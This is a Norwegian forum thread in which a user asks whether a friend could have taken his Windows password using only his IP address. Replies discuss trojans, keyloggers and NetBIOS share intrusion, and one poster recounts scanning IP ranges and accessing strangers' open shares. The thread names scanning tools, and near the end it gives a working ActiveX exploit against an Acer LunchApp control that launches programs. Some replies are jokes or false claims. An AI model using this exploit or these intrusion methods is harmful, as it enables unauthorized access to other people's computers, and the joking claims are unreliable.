Litt forvirra her nå...

En "venn" av meg har fått tak i info i pc'en min som passordet ved oppstarten av windows. han sier selv han bare har klart det ved hjelp av IP adressen min, er det mulig?


Han har fått ip'en min av en gjestebok på en piczo side i følge han selv.
Går det virkelig an å gjøre sånn bare ved å vite ip :s
Å vis ikke hvordan kan han ha gjort det da:

Har en gammel windown XP pro serverpak 2 bærbar ACER travelMate 291LCi hvis det skulle hjelpe.

Alt er mulig.
Jeg tipper han sendte deg en fil som du kjørte (trojan).

Kan du gi et par eksempler på noen trjaner som ikke blir oppdaget av det derre Nortan eller hva det heter?

De man lager/modifiserer selv, alle du finner på interentt blir oppdaget av AV-software.

Han har jo ikke hacket IP adressen din da dette bare er et nummer, han må ha kunnet sendt over filen på en eller annen måte. Siden du navnte Piczo sier jeg MSN...

Så det går altså ikke ann å hacke folk av å bare vite ip`en til den personen ?

Du skjønner det er mange her som tror de kan klare det bare via min ip addresse. :S

Joda, det går an, men de du har snakket med lyver nok.

Det var da enda godt.. alle driver å truer med at de har ip`n osv å sier de skal hacke meg..
Hehe.. men regner med man må ha ganske bra med skills for å klare dette bare pga ip`n.

Ok, da har jeg bare et spørsmål igjen, er det noe man kan gjør med ip adressen egentlig?
fant den her: http://www.nirsoft.net/utils/ipnetinfo.html
Men ser jo bare til hvilket abonement han har osv. :S

Hvis du har pc en din koblet rett inn i modemet uten firewall, er det ikke akkurat vannsklig å "hacke" litt ! Men regenr emd at de fleste er forbi dette stadiet?


Men uansett, han har sikkert brukt andre metoder som en keylogger...

Ok, er det noen enkle kayloggere som her gratis nå for tiden?

Her var det mye morsomt.

POPCORN anyone?

Nei, takk.

Ja takk, spetznaz *humre*

Hvis noen hacker IPen din så kan pcen sprenge (gjelder bare ved bærbare)

Så litt på det før, de kan bruke IP-adressen din til netbios-hacking. Dette er kun mulig hvis du deler filer og dere trenger ikke å sitte i noe lokalt nettverk for at dette skal være mulig. NetBIOS hacking er veldig enkelt, det er det helt sikkert mange her inne som vet.

Han har sikkert hacket 127.0.0.1
http://www.freakforum.nu/forum/showthread.php?t=60582

Forklar....

Mener å huske at jeg leset noe om backdoors i de Acermaskinene, som kom fra fabrikken?

Nå er det jo slik at NetBIOS/Windows shares går på port 139 bl.a. og omtrent alle
bredbåndsleverandører leverer nå routermodem som ikke forwarder slik trafikk ut mot
nettet.

Ja takk, mer popcorn!

Hvordan funker denne "serverpakken"?

Du mener den porten er sperret? Det er fortsatt nok av folk som har porten åpen. Det går også på 137 og 445 vel.

NetBIOS hacking fungerer slik at en feks. bruker et kommandovindu i windows og utfører noen kommandoer som gjør det mulig å sjekke om en maskin deler noen filer via windows fildeling. Hvis dette er tilfelle, så kan noen andre kommandoer brukes for å sjekke hvilke filer dette er og få tilgang til de akkurat som om de var fysisk på maskinen. Denne fildelingsstien kan "monteres opp" i windows slik at en bare kan trykke på et harddisk ikon for å koble til de delte ressursene akkurat som når en klikker seg inn på sin egen harddisk i "Min datamaskin". Dvs. hvis du deler noen filer, så bør du kanskje tenke deg om to ganger før du lar de være delte selv om du ikke skulle være på noe lokalt nettverk med den andre som prøver å få tilgang. Internett er jo et stort nettverk i seg selv.

Hvis tilfellet er netbios kan man sjekke Windows sine kontakter ved kommandoen "nbtstat".
Mer 'corn. Last ned en gratis brannmur fra f.eks Sygate, og systematisk gå igjennom og sjekk alle programmer som ønsker tilgang til omverdenen og motsatt.

Tror det er flere som ikke vet de deler filer, det er folk som faktisk deler hele harddisken sin etter det jeg så før hvertfall, men da kan jeg ikke huske at ADSL modemene oppførte seg som rutere.

Det står endel info om dette her: http://www.grc.com/port_445.htm

hacking cracking, samme det.. ^^

Send over mer popcorn..

Spør fyren hva han gjorde da.. Hadde vært interessant. (Om han ikke vil svare, brukte han gjerne kjiipeste metode, (hehe netbus?))

Ville åpnet mmc og sett om det stod noesomhelst i loggene..
Om det er firewall på maskinen, så er det gjerne en bedre logg der.
(Gjerne ikke poste hele loggen uten å retusjere feks din IP osv)

Hmm.
Tja. Ellers er det vel ikke akkurat få måter å bruke IP-adressen til å komme noen vei.

445 høres sannsynlig ut.

Internet-explorer bugs.. injecte en fil via kanskje javascript bug, få maskinen til å sende ut en terminal-prompt..
Mye gammelt drit som ennå virket på severepack2

Som flere nevner.. I dag er det ofte modem/router bokser med innebygget firewall som står for sikkerheten til windows :P hehe


En tid, da ngt var begynnt å kmme på banen med adsl, kom jeg over et program kallt legion.
Det søkte etter åpne porter i en angitt IP-range.. feks 217.13.4.* (netbios shares)
Jeg ble sjokket over hvor mange shares som dukket opp. Hundrevis!

Så renses alle av de 'svarene' så bare de som har 'tilgjengelige shares' ble igjen. (noe ala: c-disken %20)

Dumme meg, klarte ikke dy meg. (hadde fint lite ide hva jeg egentlig holdt på med, akkurat som i dag ; )

2 av de IP'ene jeg satt igjen med hadde delt alle harddiskene sine,
OG ene hadde en delt Printer.. Begge uten passord!

Jeg gjorde ingenting annet enn å bekrefte jeg kunne koble Sharesene til hos meg,
samt la igjen en tekst fil på skrivebordet hos ene - hvor jeg skrev Hva som var situasjonen, og hva som enkelt kunne rette på det.

For den maskinen med printer,
installerte jeg likegodt den som nettverksprinter, og Skrev det ut til han.

Så det var gjerne han som ringte NGT etter han fant den utskriften i 'loggen'. hehe

Så ringte NGT å kjeftet på min romkamerat.

Skulle sett ansiktet hans når jeg kom hjem. hehe
"De ringte fra NGT..." ...
"...aldri gjøre det igjen!"



And I haven't..

Det viser at en ofte kan komme 'langt' med hva en lærer på noen halvtimer på nett..
Glad jeg ikke er en 'format c:' type uten humor.. Da var det ikke ngt som ville ringt.
(bra de hadde litt humor også

Håper kameraten din kan røpe hemmelighetene sine.. hehe Samme hvor Über - eller lame de måtte være

du har vel ikke det programet enda??

hehe..alltid kjekt med slike på lan

Det programmet hadde jeg også for en tid tilbake, det var effektivt til å finne shares og tok ikke lang tid, den kjørte vel en "ping-sweep" som gjorde at den sjekket alle IP-er etter hverandre i den IP-rangen som ble skrevet inn.

http://www.cotse.com/tools/netbios.htm

haha... nå i verision 2.1


Men det finnes bedre verktøy -kryssplattform mac/lin/win.. Nmap (fe)
Nå når firewall er mer vanlig.

har glemt navn på share tools i linux nå.. smb_view ? hm. no.
men denslags ting iallefall.

Som icebyte sier.. ping sweep

Men det meste vil gjerne blokke det nå for tiden,
så hva var det.. nmap -P0,
eller tcp ack til 445 ?

kan hende det er noen andre lærerike leketøy på den siden jeg postet og

metasploit er vel nutidens tilsvarende leketøy..
så er det endel 'større' (les: komersielle) programmer til å sjekke ut hvilke svakheter EN gitt IP kan ha..
som var topic

Nei du klarer ikke hacke deg inn på en pc med bare ip adresse..

Du klarer ikke engang og spore opp hvem som eier en pc- med bare ip-adressen, hvis ikke du hacker nettselskapet, noe han sikkert ikke kan. det du kan finne ut av en ip-adresse er hvilke land du bor i /evt fylke. han kan finne ut hvilke nettselskap du bruker. han kan ha sendt deg en keylogger, som oberservere alt du tykker og går inn på og sender informasjonen over til han selv. men du trenger selve pc-nummeret og et password som må acceptes fra begge pc-ene til å hacke seg inn på din pc..

Om han er en "venn", kan du jo politianmelde han sinden han har "hacket" deg :P

ip adresser er enkelt å finne.. cmd kan ofte brukes

net stat

Herregud, kan du ikke suke da? Download.com har det du trenger, og pass på ruttskrævengu også

Det stemmer den backdøren er slik at du bruker ActiveX script på en internett side.
og ber vedkommende om og gå inn på siden som har acer.

Programmet som heter LunchApp.APlunch er laget av acer
Gjør det mulig og kjøre programmer.

Exempel script:

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>

Dette vil da i teorien åpne programmed calc som er og finne i alle windows platformer. Bare bruk fantasien så finner du hva man kan gjøre.

Net stat er fint og bruke ja. For og finne ip en til en på msn, skriv:

net stat, ta kopi av teksten

Send din venn på msn en ting
Skriv net stat igjen og sammling resultatet du skal ha en ny ip altså din venns.

Han får ikke tilgang til stasjoner og slikt der riktig nok. Men han har tilgang til registret ditt og Datamaskinbehandling. Her han kan da riktig nok gjøre litt ugang.